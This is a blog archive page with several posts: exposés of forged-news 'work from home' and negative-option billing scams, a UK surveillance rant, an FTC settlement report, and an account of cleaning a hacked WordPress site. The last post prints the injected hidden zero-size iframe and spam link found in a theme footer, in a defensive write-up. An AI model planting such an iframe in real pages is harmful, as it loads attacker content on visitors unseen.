Tag Archive: dodgy

(Karmic) Retribution on Pacific Webworks?

Chapter 11 Bankruptcy on Internet “Business”, Pacific Webworks.

Tangled Web

Tangled Web

Following several knock-downs by disgruntled, ripped-off individuals and hefty wallops from Google, it appears that running legal is difficult for Utah based business Pacific Webworks (PWW) ….  They’ve just filed for Chapter 11 bankruptcy.  Announcement here.

This allows them to stay in business and re-organise their debts… gives them a “fresh” start, it says.

Sow and Ye Shall Reap.

Karmic retribution is a bit like Jesus’ saying about reaping what you sow.

If you examine this web search on this website you will see that I have written several articles on PWW and their previously dodgy web practices.  Many times I warned them that their behaviour would lead to no-good.  I stated that I did not have to do anything – that karma would see them fail – and so they have.

The Future

PWW, formerly a tarmac company, now has time to figure out what to do.  If they stay legal I wish them well and hope they prosper.  If not, there’s always karmic retribution.  Reducing this makes us and the world, better.

 

Related Posts:

Estonian Spammer Forges CBS and The Guardian

Get Rich Quick Scam Forges Genuine News Agencies Web Pages

Gmail Spam

Gmail Spam

I recently received two emails from a friend’s old Hotmail account, but to two of my email addresses.

Email Spam

Email Spam

Probably, the account has been hacked as I could detect no spoofing in the emails’ headers.  These are the emails, with the email addresses blacked out.

Initial Email Investigations

The text is similar in that they try to entice a user using pretty poor English to click on the shortened URL links, which are active.

Here’s how the links work:
To my Email address;
cbsbusiness9

cbsbusiness9

I had http://cbsbusiness9.com/index2.php?/5260 which then goes to

http://cbsbusiness9.com/uk.html?/partners/the-guardian/small-business/5672-9782-67834/making-money-online/

 

To my GMail address;
cbsnews-article

cbsnews-article

I had http://cbsnews-article.com/index2.php?/4032 which then goes to

http://cbsnews-article.com/uk.html?/partners/the-guardian/small-business/5672-9782-67834/making-money-online/

 

The screenshots show the results using a neat Firefox plugin, Flagfox, which displays the source IP address and country on mouse-over.

The WHOIS’s of each domain are almost identical.  These are screenshots.

whois.domaintools.com screen capture 2012-12-12-17-12-26 whois.domaintools.com screen capture 2012-12-12-17-13-17 That Arthor Brown’s a one, eh?  Notice the Ukrainian, Russian and New York connections?   Who is/are  or what is:

TNew line ave 172 95
NY, 18274
UNITED STATES
+1.7343541732

Google Search on +1.7343541732

Google Search on +1.7343541732

Googling the phone number pulls out a heap of (not)surprises including an awful cesspit of scamminess that’s now starting to rival Pacific Webworks’ Google Treasure Chest and Jesse Willms’ Colon cleansing efforts!  (We saw these scams a few years back – check the links)

Just check out the fake news and dodgy sounding sites in the search results….  These are the first couple of pages of current search results:

  • Com-news8.net
  • Bcnews8.com
  • Dildobigg.com
  • Raspberry-Ketone24.com
  • BigGgEts.com
  • HurtGuys.com
  • GrowsPeniss.com
  • HugerAss.com
  • Com-news9.net
  • Com-nbcnews9.net
  • coloncleanse-extreme.com
  • nbc9news.com
  • nbc1news.com

Arthor Brown is in most of them with his Yahoo! email address as arthor-brown289289@ymail.com.   Please don’t confuse him with this Arthur Brown, but yes, handle all of these websites like Fire!

Forged Webpages of The Guardian Newspaper

cbsnews-article.com screen capture 2012-12-12-16-3-51

cbsnews-article.com screen capture 2012-12-12-16-3-51

cbsbusiness9.com screen capture 2012-12-12-16-3-23

cbsbusiness9.com screen capture 2012-12-12-16-3-23

The Guardian, is an old and respected news organisation in the UK.  CBS is a long-established US media network.

They, and the purported author of both webpages, Sirena Bergman, must be pretty pissed off about the hijacking of their names.

Also to be annoyed, is Lloyds TSB Bank who apparently are “in association” with this get rich quick scheme for work at home moms!

Completely Forged News Articles!

Indeed they are.

  • The articles are dated “December, 11:41”, which is odd since there’s no day, just month and time!
  • Both articles are embedded in genuine Guardian web-pages, with all the links surrounding the article going to genuine Guardian web-pages or genuine advertiser websites!
  • The hook links in both forged webpages go to http://workinghome22.com/go.php

The forgery is done in the same manner as the well-known phishing scams done for banks and on-line finance and insurance.

Apart from the images sourced from The Guardian, the scammer’s images are sourced from:

  • ddmcdn.com which is HowStuffWorks.com!
  • localconsumeralerts.com
  • prosperadtracker.com
  • ophan.co.uk

So, Who Is workinghome22.com

Bad Gateway

Bad Gateway

The first link was dead, opening a bad gateway so the expected redirect didn’t work.  The tracking pointed back to Ireland!

Bad Gateway

Bad Gateway

The second link worked, but the sweetly named workingfromhome22.com wasn’t the destination.   No, the link immediate re-directed to http://onlineincnow.com/2/?aff_sub=72

Well, at least the affiliate number 72 is getting paid….

But hang on, who exactly is workingfromhome22.com?
workinghome22.com screen capture 2012-12-12-16-31-44

workinghome22.com screen capture 2012-12-12-16-31-44

Well, typing the URL directly takes me to workingfromhome22.com!  This is it!

Cunningly, you’ll note that it’s pulled out my home-town as Bournemouth (where I live) with that awful “mom” Americanism!  No-one in the UK addresses their mother as mom…  I mean, FFS?

The webpage links, containing the disreputably used graphics of Thomson, Reuters, CNBC and NBC Universal all point to http://workinghome22.com/go.php, which is of course in this domain.  So let’s click it, shall we?

Well, pctrck.com is trying to load, but not much else.

Reversing then trying to exit workinghome22.com produces a pop-up of dubious functionality!  Check the words – there’s no cancel button!

workinghoome22_Popup

workinghoome22_Popup

I did however manage to successfully close this page following that.  Whew!

Now Back to onlineincnow.com

OnlineIncNow Location

OnlineIncNow Location

The previously mentioned http://onlineincnow.com/2/?aff_sub=72 is located in the USA.

So What Is It Up To?

OnlineIncNow.com Whois Record

OnlineIncNow.com Whois Record

Good Question!   A WHOIS puts the registrant in China with the DNS servers in Russia!

As I mentioned earlier, the similarity of the scamminess of this thing is just like the Google Treasure Chest/ Google Money Tree / PWW scams of old.

The site is plastered with the logos of well known businesses to ad an air of authenticity to things (just as the original hook sites used The Guardian Newspaper and CBS in the same way) yet at the bottom of the page they disingenuously ad:

This site and the products and services offered on this site are not associated, affiliated, endorsed, or sponsored by NBCNEWS, ABC, USA Today, CNN or Fox News, nor have they been reviewed tested or certified by NBCNEWS, ABC, USA Today, CNN or Fox News.

onlineincnow.com T&C Screenshot

onlineincnow.com T&C Screenshot

Despite all this, it is of course bollox set to deceive.  In fact, it now appears that it’s the well known negative option scam, used by Pacific Webworks (PWW) and Jesse Willms to good effect until they were found out.

Let’s see how this pans out, shall we?…..

Check out the T&C page from the tiny link in the page footer – screenshot on the right.

  • They say that the applicable law is the State of Florida.
  • You will become a “member” and the key phrases are here:

You must register as a “Member” with Online Income Now to access certain functions of the website. You must provide current, complete and accurate information about yourself (the “Registration Data”) when registering as a Member. You agree that such information is truthful and complete. You agree to maintain and keep your Registration Data current and to update your Registration Data as soon as it changes. You are responsible for maintaining the security of your password. Online Income Now is not liable for any loss that you suffer through the use of your password by others. You agree to notify Online Income Now immediately of any unauthorized use of your account or other breach of security known to you. You also, by becoming a Member, agree to report violations of these Terms and Conditions by others to Online Income Now.

For a limited time only, the cost of this product is $97.00 ( usual price $299.95 ) and every 32 days thereafter you will be billed the member’s only price of $9.95 for the monthly use.

MATERIALS PROVIDED TO Online Income Now OR POSTED AT ANY Online Income Now’s WEB SITE

Online Income Now does not claim ownership of the materials you provide to Online Income Now (including feedback and suggestions) or post, upload, input or submit to any Online Income Now Web Site or its associated services (collectively “Submissions”). However, by posting, uploading, inputting, providing or submitting your Submission you are granting Online Income Now, its affiliated companies and necessary sublicensees, permission to use your Submission in connection with the operation of their Internet businesses including, without limitation, the rights to: copy, distribute, transmit, publicly display, publicly perform, reproduce, edit, translate and reformat your Submission; and to publish your name in connection with your Submission.

You’ll see that “Online Income Now” will:

  • make you a “member” (of what?)
  • and you will be regularly billed, (why?)
  • and that for anything you post, upload etc (wah?  whadya mean?  Where is this uploading?),  “Online Income Now” will take no responsibility for what you do!

…………….which is curious as you don’t know what you’ll be doing and they have invited you to do it in the first place!!!

Now Lets Click The Link!  Follow that Opportunity!

onlineincnow.com screen capture 2012-12-12-17-46-50

2 Spots Left!

Amazingly (sarcasm alert) there are two “spots” left in my area!  This is the page… http://onlineincnow.com/2/index2.php

Michelle Johnson is the “guru” who will tell me everything!  So what do I do?  I have two options:

  • Back out
  • Sign up

Let’s Try Backing Out, Shall We?

CannotBackoutFromOnlineIncNow2

Cannot Backout From OnlineIncNow 2

CannotBackoutFromOnlineIncNow

Cannot Backout From OnlineIncNow

Well of course, they won’t let me.  It takes two goes to get out and the first one completely takes over the browser!  Bad.  This is B.A.D.

Ah, well.  Finally escaped.

Let’s Try Clicking to the Signup Page, Shall We?

secure.onlineincnow.com Data Entry Screen

secure.onlineincnow.com Data Entry Screen

I decide on my name, “Jobless Jake” and a random phone number…. The website is now https://secure.onlineincnow.com/2/cc_97.php

What I see is bad, really bad, and any attempt by this pack of jokers at saying they don’t run a negative option scam is now revealed on this sign-up page!

The scam is now revealed for what it is – a negative option scam!        Read it carefully…..  They expressly say;

By enrolling, you will be charged a one-time fee of $97.00

In teeny-tiny letters, note!

But remember, right back buried in the T&C’s they say;

every 32 days thereafter you will be billed the member’s only price of $9.95 for the monthly use.

This is expressly against the FTC code and laws in most countries.  If any extra charges are to be levied for any service or goods, they should be expressly stated on the sign-up page where the customer first enters their financial details.

Gotcha! You Bastards!

Okay, I’ve Had Enough of This. I’m Off!

“Not so fast, young Jobless Jake”, say onlineincnow.com……!

CannotBackoutFromOnlineIncNow3

Cannot Backout From OnlineIncNow 3

They’ve an extra 20% off plus and extra bit of webpage-erese!  The screenshot says it all, though it wasn’t the end of it.  I had one more “Leave Page” option like the earlier one above.

Conclusion

Negative Options are banned by law in most countries.  If you get collared by one, you’ll have a job stopping the bastards taking money from your account for ages.  The only sure way to stop this once you’ve been sucked in is through….

  • Chargebacks.   Get your bank or card company to get a charge-back saying the terms of trade or purchase were hidden (as seen in my screenshot above).

So………………….

  • It’s a scam.
  • Stay away from it.


Enhanced by Zemanta

Related Posts:

Tories Reveal Authoritarian Roots While Liberals Check Their Shoelaces

None are more hopelessly enslaved than those who falsely believe they are free.Johann Wolfgang von Goethe

Yet again I’m forced to side with the grinning David Davis.  This doesn’t happen often and is embarrassing to admit!.

ConDem Coalition Pledges Broken!

ConDem Coalition Pledges Broken!

It’s all about the government plans to allow full-scale unauthorised real-time monitoring of every person in the UK’s internet activity!  It’s so 1984.

“It was a bright cold day in April, and the clocks were striking thirteen” – (George Orwell: Nineteen Eighty-Four
.

Orwell must be turning in his grave in despair that what he predicted as a warning about what not to do, now looks like coming to fruition.

Remarkably, since wangling themselves into government, the conservative-libdem coalition government is now actually dropping a key part of their manifesto which they laboriously agreed two years ago.  This can still be found on the government website, page 11 to be exact (pdf) .  Here’s what they said:

  • The Government believes that the British state has become too authoritarian…. We need to restore the rights of individuals in the face of encroaching state power – FAIL
  • …reverse the substantial erosion of civil liberties and roll back state intrusion – FAIL
  • … introduce safeguards against the misuse of anti-terrorism legislation – FAIL
  • …end the storage of internet and email records without good reason – FAIL
  • …a British Bill of Rights that … protects and extends British liberties – FAIL

(Actually, the whole Con-Dem pledge list makes good reading to see just how far removed from it our evil diktat of quangos has become.)

So what to do – use TOR.

ID Cards

Johann Wolfgang Goethe

Johann Wolfgang Goethe (Photo credit: andreasmarx)

Not so long ago I was haranguing the former Labour government about their plans for ID Cards, their laws over CCTV and photographing in public places, the reduction  in privacy for individuals and the removal of our civil rights over detention without trial, due cause and 3rd party notification for first 90 days and them 42 days.

I left the Labour Party because of it and have not rejoined.

Huge Vocal Resentment Against UK Government Secret Citizen Monitoring Plans.

try the Tor browser bundle

The new news (I thought it was an April Fool joke initially!) is that Email and web use is ‘to be monitored’ under new laws proposed by this nasty, nasty government.  Happily, there is now a huge and vociferous resentment against this from the general public who can see this evil act for what it is.  Top among them is David Davis!  See this link and the thousands of comments for instance; Backlash over email and web monitoring plan.

Clueless

LONDON, UNITED KINGDOM - JUNE 14

Now, the tories and their liberal stooges have been shown to be both serially evil in their pronouncements and plans, and also serially incompetent of managing almost anything.

Their pathetic management of a minor industrial dispute (the fuel shortage) which did nothing except invoke almost universal resentment of the coalition and reawaken a general awareness of their ineffectiveness comes on top of stripping the very foundations away from one of UK society’s greatest inventions of the Industrial Age, our National Health Service (NHS).

United Kingdom

Top this behavioural abomination with that of the revolving door policy between banking and politics which they continue to promote with zero penalties for failure while the population-at-large have to prop up the whole system with their taxes means only two things to me.

  1. The government must do something desperate to have any hope of re-election in 3 years – this means either war (patriotism is the last refuge of a scoundrel) or economic boom-and-bust gambling.
  2. They will do something desperate to have any hope of re-election in 3 years – this means either war (patriotism is the last refuge of a scoundrel) or economic boom-and-bust gambling.

Astute folk will see this as my prediction for government actions over the next 3 years.

Tories: Keep Friends Happy

Meanwhile, hundreds of extra Tory donors will soon be available to bankroll the “all is good” story.  They will arrive as beneficiaries of the windfall provided as the “former NHS” contracts are handed out to friends, much like Michael Ashcroft benefited from the first round of NHS privatisation during the Thatcher era.  This article on Powerbase and this one (sourced from a now defunct article in The Scotsman) show quite clearly that 1/3 of cleaning contracts went to Ashcroft’s businesses during this time, saying;

MICHAEL Ashcroft, (…) bankrolled an “independent” publicity campaign that allowed his multi-million-pound contract cleaning empire to prosper and led to a change in the law. The campaign was run from the London office of the former Conservative Scottish secretary, Michael Forsyth. A spokesman for Mr Ashcroft confirmed last night that he had contributed to the Public and Local Service Efficiency Campaign (PULSE), which was set up in 1985 to persuade the public sector to contract out services such as cleaning and catering. The campaign had been disbanded by the end of the 1980s after the Conservative government passed the 1988 Local Government Act .  Mr Ashcroft’s Hawley Services Group, a contract cleaning firm later known as ADT, flourished under the new regime, with ADT, winning a third of NHS contracts between 1983 and 1988.

For further information into the depths that the Tories will go to enable all public money to be fed straight to their business friends, see this article which pulls apart the dealings of Ashcroft, discredited Dame Shirley Porter, NIMBY Nicholas Ridley, Chris Chope (the dog turd of Christchurch) and current (dodgy expenses, remember) minister Eric Pickles.

THE PICKLES PAPERS

By Tony Grogan
First published by 1 IN 12 PUBLICATIONS 1989
21 – 23 Albion St. Bradford 1.
Copyright 1 IN 12 Publications 1989
ISBN 0 948994 04 5

Once read, apply the same logic to our dear NHS, and weep again.  The same modus operandi is being used;

  1. discredit the current, imply alternatives are better;
  2. farm out internal monies to external Tory benefactors.

It’s just more sleaze just like under Thatcher before, backed up with warlike rhetoric.  Remember, only 10 days ago we had the news of billionaire Tory donors at Cameron’s dinner table, and Cameron trying to defend the cash-for-access news that made Labour’s cash-for-questions scandal appear like a sweetshop-ish wheeze in comparison.  See 

Tory Party chairman Lord Feldman was one of the key figures in the ‘cash for access’ scandal which erupted after Tory party treasurer Peter Cruddas was caught offering a private dinner with David Cameron to undercover reporters who posed as wealthy party donors.  Read more: http://www.dailymail.co.uk/debate/article-2123692/Tory-cash-access-row-David-Cameron-crony-pal-cash-questions.html

as well.

Enhanced by Zemanta

Related Posts:

FTC Take Action: Is This The End of The Fake News Site?

FTC Permanently Stops Six Operators from Using Fake News Sites that Allegedly Deceived Consumers about Acai Berry Weight-Loss Products

Above is the FTC’s own headline from a news release yesterday.  The story is that they’ve hammered six operators of fake news sites into making settlements that surrender their assets.  They’ve also halted the six operations plus those of four others, making ten by my calculation!

What Is a Fake News Site?

Do you really need to ask?   !!    (These are for news7digest, see more below on this!).

Anyone who even casually browses the web will have seen these news exposes, quite often advertised down the right side on Facebook and in banner adverts on even the most sensible of websites – like this one, say!

How the adverts work is that they are paid for by the operators.  They deliberately pay to get premium visibility slots, using Google often, but not exclusively.

The fake news site itself will be plastered with well known icons of top companies (like CNN, BBC, CBC, ABC, Google even!) and purport to be a serious investigation by a journalist into whatever the scam may be.  A short list of such scams that we’ve revealed here are:

  • Acai weight loss
  • Tea weight loss.
  • Acai bowel cleanse.
  • Other bowel cleanse.
  • Get rippling muscles.
  • Make money on Google.
  • Get a cheap payday loan.
  • Get a cheap government grant.
  • Get rejuvenation skin cream.
  • Look younger in other ways.
  • Gamble on penny auctions.

channel4online.co.uk

Just yesterday, Peter Farrahy asked why these fake news sites are still going on this post about Jesse Willms.

So taking his example of the very plausible looking channel4online.co.uk and doing a search on it like so:

http://www.google.co.uk/search?q=channel4online.co.uk

…produces several links to the actual Channel 4 in the UK, and the scam site….

This shows the deliberate, deceptive and despicable way in which the site name has been chosen to closely imitate a legitimate and bona-fide news organisation.  Fraud, in other words – as the definition says – “an intentional deception made for personal gain or to damage another individual”

Amazingly, if you click the link several times, each effort takes you to one of three different landing pages for a new site, the actual fake news site of,

news7digest.com

This shows up in the header image in two, but confusingly is called Consumer Reporter in the other!  They are all visually quite different.

The three screenshots near the top of this article are indeed the three fake news sites which you’ll land on by clicking on channel4online.co.uk.

Here they are again, to save you scrolling:

Conclusion

Is this the end of the fake news sites?  Well, obviously not.

They are still very very current and still very very visible.  The highly photoshopped images adorn well known websites to the point of irritation.  However, the settlement was only yesterday.  The note on the FTC statement goes on the say;

A settlement order is for settlement purposes only and does not constitute an admission by the defendant that the law has been violated. Settlement orders have the force of law when approved and signed by the District Court judge.

Despite this, it appears the six defendants are caving in as no appeals have been launched.  They are and the details of the settlements are as follows:

  • Ricardo Jose Labra Labra’s $2.5 million judgment will be suspended when he pays $280,000 and records a $39,500 lien on his home.
  • Zachary S. Graham, Ambervine Marketing, LLC and Encastle, Inc. Graham’s $953,000 judgment will be suspended when he pays $110,000 plus most of the proceeds from the sale of a truck.
  • Tanner Garrett Vaughn Vaughn’s $203,000 judgment will be suspended when he pays close to $80,000 over a three-year period.
  • Thou Lee Lee’s $204,000 judgment will be suspended when he pays $13,000 plus the proceeds from the sale of a BMW.
  • Charles Dunlevy Dunlevy’s $143,000 judgment will be suspended when he pays an estimated $2,000 from frozen assets and the sale of a boat.
  • DLXM, LLC and Michael Volozin The $594,000 judgment will be suspended because of the defendants’ inability to pay.

 

I see it as a warning shot.  The actual wording of the terms against the six goes as follows.  It’s quite onerous and specific, I think, which means that these News7Digest screenshots at the top of this posting put the operators in deep doggy do if they don’t get their act together pronto.  The highlights are mine.

As part of its ongoing crackdown on bogus health claims, the proposed settlements will require that the six operations make clear when their commercial messages are advertisements rather than objective journalism, and will bar the defendants from further deceptive claims about health-related products such as the acai berry weight-loss supplements and colon cleansers that they marketed.

The defendants also are required to disclose any material connections they have with merchants, and will be barred from making deceptive claims about other products, such as the work-at-home schemes or penny auctions that most of them promoted.  The settlements also require that these defendants collectively pay roughly $500,000 to the Commission because their advertisements violated federal law.  This money amounts to most of their assets.

A Sample of My Previous Posts Mentioning Fake News Websites

This all proves that what I and others are saying is wrong – and the FTC is proving it!  Virtually everything that the scammers do the FTC has now taken issue with and imposed heavy penalties.  It’s now, as they say, case law, as well as being the law of the land.  Let’s hope that Willms who chucked his power derived from ill-gotten wealth at me making me pull a page or two for a time, gets his just deserts – sometime this year would be nice.

 

Related Posts:

Comments are closed

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me